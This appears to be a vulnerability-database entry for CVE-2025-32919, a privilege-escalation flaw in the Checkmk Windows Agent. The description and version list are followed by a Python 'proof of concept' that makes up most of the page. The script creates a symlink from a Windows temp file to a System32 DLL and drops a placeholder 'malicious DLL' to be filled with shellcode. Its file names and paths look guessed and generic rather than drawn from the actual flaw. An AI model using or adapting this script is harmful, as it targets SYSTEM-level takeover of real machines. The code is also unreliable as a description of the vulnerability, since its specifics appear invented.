Security Vulnerability Report
CVE-2025-32919 CVSS 7.8 HIGH

CVE-2025-32919

Published: 2025-10-09 15:16:06
Last Modified: 2025-12-04 20:39:36

Description

Use of an insecure temporary directory in the Windows License plugin for the Checkmk Windows Agent allows Privilege Escalation. This issue affects Checkmk: from 2.4.0 before 2.4.0p13, from 2.3.0 before 2.3.0p38, from 2.2.0 before 2.2.0p46, and all versions of 2.1.0 (EOL).

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:checkmk:checkmk:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:checkmk:checkmk:2.2.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:checkmk:checkmk:2.2.0:p1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:checkmk:checkmk:2.2.0:p10:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:checkmk:checkmk:2.2.0:p11:*:*:*:*:*:* - VULNERABLE
Checkmk 2.1.0 (all versions, EOL)
Checkmk 2.2.0 < 2.2.0p46
Checkmk 2.3.0 < 2.3.0p38
Checkmk 2.4.0 < 2.4.0p13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-32919 - Checkmk Windows Agent License Plugin Privilege Escalation PoC
# Vulnerability: Insecure temporary directory usage in Windows License plugin
# Attack Vector: Symlink attack on predictable temp directory
import os
import sys
import tempfile
from pathlib import Path

# Step 1: Identify the insecure temporary directory used by Checkmk Agent
# The License plugin typically uses C:\Windows\Temp or a predictable path
TEMP_DIR = r"C:\Windows\Temp"
TARGET_FILE = os.path.join(TEMP_DIR, "checkmk_license.tmp")


# Step 2: Create a symlink pointing to a privileged location
# This is the core of the symlink attack
def create_symlink_attack():
    """
    Create a symbolic link in the temp directory pointing to a system file
    we want to overwrite with SYSTEM privileges.
    """
    # Target: a system DLL or executable that will be overwritten
    # when the Checkmk Agent writes to the temp file
    privileged_target = r"C:\Windows\System32\target_service.dll"
    try:
        # Remove existing file/link if present
        if os.path.exists(TARGET_FILE) or os.path.islink(TARGET_FILE):
            os.remove(TARGET_FILE)
        # Create symlink (requires Developer Mode or admin for non-admin users)
        os.symlink(privileged_target, TARGET_FILE)
        print(f"[+] Symlink created: {TARGET_FILE} -> {privileged_target}")
    except OSError as e:
        print(f"[-] Symlink creation failed: {e}")
        print("[*] Falling back to file replacement method...")
        # Alternative: place malicious DLL directly in temp directory
        place_malicious_dll()


def place_malicious_dll():
    """
    Place a malicious DLL in the temp directory for DLL hijacking.
    """
    malicious_dll = os.path.join(TEMP_DIR, "license_helper.dll")
    # Write a malicious DLL payload here
    # When Checkmk Agent loads this DLL, it executes with SYSTEM privileges
    payload = b"MZ\x90\x00"  # PE header stub - replace with actual shellcode
    with open(malicious_dll, "wb") as f:
        f.write(payload)
    print(f"[+] Malicious DLL placed at: {malicious_dll}")


# Step 3: Wait for Checkmk Agent to execute and trigger the vulnerability
def wait_for_agent_execution():
    """
    Monitor the temp directory for the agent's file operations.
    The agent typically runs periodically or on service start.
    """
    print("[*] Waiting for Checkmk Agent execution...")
    print("[*] Trigger: Restart the Checkmk Agent service or wait for scheduled run")
    # In a real attack, you would:
    # 1. Restart the Checkmk Windows Agent service
    # 2. Or wait for the agent's scheduled execution
    # 3. The agent will write to the temp file, following our symlink
    # 4. SYSTEM-level code execution achieved


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-32919 - Checkmk Agent Privilege Escalation PoC")
    print("=" * 60)
    create_symlink_attack()
    wait_for_agent_execution()
```

Raw JSON Data
